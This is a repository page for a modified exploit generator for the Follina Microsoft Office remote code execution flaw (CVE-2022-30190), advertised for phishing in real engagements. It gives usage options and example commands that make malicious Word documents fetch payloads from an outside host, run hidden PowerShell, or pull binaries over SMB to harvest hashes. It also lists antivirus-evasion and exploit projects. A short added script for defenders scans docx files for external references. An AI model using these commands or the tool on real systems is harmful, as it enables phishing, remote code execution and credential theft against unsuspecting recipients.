  • Stars: 387
  • Rank 110,311 (Top 3 %)
  • Language: Python
  • Created over 2 years ago
  • Updated over 1 year ago

Repository Details

CVE-2022-30190-follina.py, modified version: supports a custom Word template, convenient for phishing use in real engagements.

'Follina' MS-MSDT n-day Microsoft Office RCE (modified version)

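Modified from the project at https://github.com/chvancooten/follina.py. You can specify a custom docx template file, which is convenient for phishing use in real engagements: edit your own phishing Word document, then pass it with the -f parameter.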

Usage:

usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

Default docx: muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
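
For defenders triaging documents like the ones this tool generates, the following added example (not part of this repository or the upstream project) lists the external relationships in a docx package and flags the non-hyperlink ones that point at remote content. It assumes the remote reference is recorded in the package's .rels parts with TargetMode="External", which is how OOXML stores external targets; the function names and the sample package are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Schemes that make Office fetch or hand off content; UNC paths count too.
REMOTE = re.compile(r"^(https?|ftp|file|mhtml|ms-[a-z]+):|^\\\\", re.I)


def external_targets(docx_bytes):
    """Return (part, relationship kind, target) for every external relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, kind, rel.get("Target", "")))
    return hits


def suspicious(hits):
    """Drop ordinary hyperlinks; keep externals that load remote content."""
    return [h for h in hits if h[1] != "hyperlink" and REMOTE.match(h[2])]


def build_sample():
    """Constructed package for the demo: only the .rels part is present."""
    base = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{base}hyperlink" Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{base}oleObject" Target="http://1.2.3.4/exploit.html" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{base}styles" Target="styles.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, kind, target in suspicious(external_targets(build_sample())):
        print(f"{part}: external {kind} -> {target}")
```

A hit is a triage lead rather than a verdict, since legitimate documents can also link external objects; when scanning untrusted files in bulk, an XML parser hardened against entity expansion is a better choice than the standard-library one used here.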

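Join the discussion

If you are interested, follow the Z2O安全攻防 WeChat official account and reply "加群" (join group), then add Z2OBot 小K, which will automatically pull you into the Z2O安全攻防 discussion group, where more good material is shared.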

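The team has set up a Knowledge Planet (知识星球) group that publishes the latest vulnerability reproductions from time to time, with step-by-step guidance, and also irregularly posts POCs and tricks for internal and external network penetration testing. If you are interested, feel free to join.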

Stars are welcome ⭐ O(∩_∩)O

More Repositories

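1. Komo (Python, 462 stars)
   🚀Komo, a comprehensive asset collection and vulnerability scanning tool. Komo integrates more than 20 tools: it obtains subdomains in multiple ways, collects domain email addresses, performs liveness probing, domain fingerprinting, domain-to-IP lookup and IP port scanning, crawls web service links and sends them to xray, runs POC vulnerability scans against web services, and runs host vulnerability scans against hosts.

2. POC_Collect (225 stars)
   (Continuously updated) This project stores the latest POCs and EXPs detected daily by the team's bot 小K, along with POCs I have collected myself, to make vulnerability lookup easier during penetration tests and to support penetration testing in offline environments.

3. Powershell_bypassAV (PowerShell, 48 stars)
   PowerShell AV-evasion script

4. Dcerpc_Find_OSInfo (Python, 25 stars)
   🗽 Probes Windows remote host information using NTLMSSP, based on raw sockets

5. CrawlArticleToMarkdown (21 stars)
   Article-crawling bot 😎 Crawls articles from WeChat official accounts, Zhihu, Zhihu columns, Jianshu, SegmentFault, Juejin, CSDN, V2EX and Cnblogs and converts them to markdown

6. CVE-2020-16898--EXP-POC (Python, 13 stars)
   CVE-2020-16898 Windows TCP/IP remote code execution vulnerability EXP & POC

7. Mytools (Python, 12 stars)
   🐱‍🏍 Small red-team tools | assorted scripts I wrote for use in penetration testing

8. Invoke-Obfuscation-Bypass (PowerShell, 10 stars)
   PowerShell AV evasion: analysis and modification of Invoke-Obfuscation-Bypass

9. CVE-2022-44877-RCE (9 stars)
   CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution

10. BypassAV_Script (8 stars)
    A project for learning antivirus bypass

11. url_alive_scan (Go, 7 stars)
    A multi coroutine concurrent batch URL survival detection tool written in Go, with concurrency determined by CPU by default.

12. fofa_filter_plus (JavaScript, 7 stars)
    fofa_filter_plus: get all fofa assets for free

13. github_monitor (Python, 7 stars)
    Monitoring and push notifications for updates to specified GitHub projects

14. AutoHotkeyScript (AutoHotkey, 7 stars)
    AutoHotkey V2 script that automatically adds a default language to Typora code blocks so they get syntax highlighting

15. emailall (Python, 6 stars)
    Modified version of emailall with some bugs fixed

16. CVE-2020-16898-EXP-POC (Python, 5 stars)
    CVE-2020-16898 Windows TCP/IP remote code execution vulnerability EXP & POC

17. Ip2domain (Python, 5 stars)
    🚀 Tool for bulk reverse lookup of domains from IPs via SSL certificates

18. komoproxy (Go, 4 stars)
    Socks5 proxy pool polling tool, supports ipv6 proxy, supports fofa collection proxy, supports importing custom Socks5 proxy files.

19. hakrawler_plus (Go, 3 stars)
    Modified version of hakrawler; adds -u to take the URL from a parameter

20. nginxWebUI_runCmd_RCE (Python, 2 stars)
    nginxWebUI runCmd RCE POC

21. first (Python, 1 star)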